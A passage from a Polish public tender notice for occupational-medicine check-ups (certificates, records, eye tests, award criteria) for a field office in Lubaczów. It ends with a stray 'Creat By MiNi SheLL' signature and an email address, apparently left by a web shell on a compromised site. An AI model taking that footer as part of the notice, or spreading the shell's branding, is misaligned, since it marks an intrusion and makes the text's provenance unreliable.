c)	wydawanie orzeczeń lekarskich stwierdzających brak przeciwwskazań zdrowotnych do pracy na określonym stanowisku lub przeciwwskazania zdrowotne do pracy na określonym stanowisku zgodnie z obowiązującymi wzorami określonymi Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 roku w sprawie badań lekarskich pracowników z zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. z 1996 r Nr 69, poz. 332 ze zm).
d)	prowadzenie i przechowywanie dokumentacji medycznej indywidualnej i zbiorowej z zakresu profilaktycznej opieki zdrowotnej zgodnie z obowiązującymi przepisami - Rozporządzenie Ministra Zdrowia z dnia 29.07.2010 r. w sprawie rodzajów dokumentacji medycznej służby medycyny pracy, sposobu jej prowadzenia i przechowywania oraz wzorów stosowanych dokumentów  (Dz. U. z 2010 r. Nr 149, poz. 1002),
e)	wydawanie recept na zakup okularów korygujących wzrok oraz stosownego zaświadczenia w przypadku stwierdzenia potrzeby ich stosowania przez pracowników pracujących przy obsłudze monitora ekranowego po przeprowadzeniu badań wzroku - zgodnie z Rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 01.12.1998 roku w sprawie bezpieczeństwa i higieny pracy na stanowiskach wyposażonych w monitory ekranowe (Dz. U. z 1998r Nr 148, poz. 973).
3.W zakresie przedmiotu zamówienia ustalony jest minimalny zakres badań do wykonania każdemu skierowanemu na badania pracownikowi:
a)	Badanie lekarskie i wydanie orzeczenia,
b)	Badanie moczu,
c)	Badanie morfologiczne krwi,
d)	OB,
e)	Badanie okulistyczne (wraz z ewentualnym wydaniem recepty na okulary).
4.	Inne badania dodatkowe do wykonania wg decyzji lekarza medycyny pracy po uwzględnieniu wskazanych w treści skierowania na badania informacji o zagrożeniach związanych z pracą.
Badania Profilaktyczne pracowników Biura terenowego w Lubaczowie winny być wykonywane w mieście będącym siedzibą Biura Terenowego, tj. w Lubaczowie lub Jarosławiu lub Przeworsku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.14.70.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 91</li>
<li>2. Badania dodatkowe gratis w ramach minimalnego zakresu badań dla wszystkich pracowników - 9</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com